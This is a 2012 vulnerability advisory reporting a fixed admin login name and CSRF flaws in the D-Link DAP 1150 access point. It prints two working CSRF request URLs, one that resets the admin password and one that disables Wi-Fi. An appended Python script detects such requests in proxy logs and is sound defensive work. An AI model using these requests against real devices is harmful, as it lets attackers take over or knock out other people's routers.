SECURITYVULNS:DOC:27677
Feb 15, 2012

AoF and CSRF vulnerabilities in D-Link DAP 1150

Hello 3APA3A!

I want to warn you about new security vulnerabilities in D-Link DAP 1150 (Wi-Fi Access Point and Router).

These are Abuse of Functionality and Cross-Site Request Forgery vulnerabilities. This is my third advisory in a series of advisories about vulnerabilities in D-Link products.

Abuse of Functionality (WASC-42):

The administrator's login is fixed (it is "admin") and can't be changed, only the password can, which makes Brute Force attacks easier.

CSRF (WASC-09):

All functionality in the admin panel is vulnerable to CSRF. Here are two examples.

Changing the admin's password:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|

In the Wi-Fi / Common settings section, it's possible via CSRF to turn Wi-Fi on/off, and also to change MBSSID and BSSID.

The following request will turn off Wi-Fi:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%20%22mbssidNum%22:1,%20%22mbssidCur%22:1}

The following model is vulnerable: D-Link DAP 1150, firmware version 1.2.94. This model with other firmware versions must also be vulnerable.

I mentioned these vulnerabilities on my site (http://websecurity.com.ua/5561/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
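
The requests above change device configuration through plain GET URLs, so a proxy log can be checked for such requests arriving from another site. The following is an added detection example, not part of the original advisory: it assumes a constructed log format (`client url referer`) and treats any `index.cgi` request carrying both `res_config_action` and `res_config_id` as a configuration write.

```python
from urllib.parse import urlsplit, parse_qs

# Parameters present in both state-changing requests shown in the advisory.
# Assumption: any index.cgi request carrying both is a configuration write.
CONFIG_PARAMS = {"res_config_action", "res_config_id"}


def is_config_change(url):
    """True if the URL targets index.cgi and carries the config-write parameters."""
    parts = urlsplit(url)
    if not parts.path.endswith("/index.cgi"):
        return False
    query = parse_qs(parts.query, keep_blank_values=True)
    return CONFIG_PARAMS.issubset(query)


def classify(line):
    """Classify one log line of the assumed form: <client> <url> <referer>."""
    client, url, referer = line.split()
    if not is_config_change(url):
        return "ok"
    if referer == "-":
        # No Referer: typed URL, bookmark, or a page that suppressed it.
        return "review"
    if urlsplit(referer).netloc != urlsplit(url).netloc:
        # A page on another origin triggered a configuration write.
        return "alert"
    return "ok"


# Constructed sample log lines (not captured traffic).
SAMPLE = [
    "192.168.0.23 http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3"
    "&res_config_id=69&res_struct_size=1&res_buf=password| http://forum.example/thread/17",
    "192.168.0.23 http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json"
    "&res_config_action=3&res_config_id=39&res_struct_size=0"
    "&res_buf={%22Radio%22:false,%20%22mbssidNum%22:1,%20%22mbssidCur%22:1}"
    " http://192.168.0.50/index.cgi",
    "192.168.0.23 http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3"
    "&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false} -",
    "192.168.0.23 http://192.168.0.50/index.cgi http://forum.example/thread/17",
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry), entry.split()[1][:60])
```

A Referer comparison is a detection heuristic only; it does not remove the underlying CSRF weakness in the device.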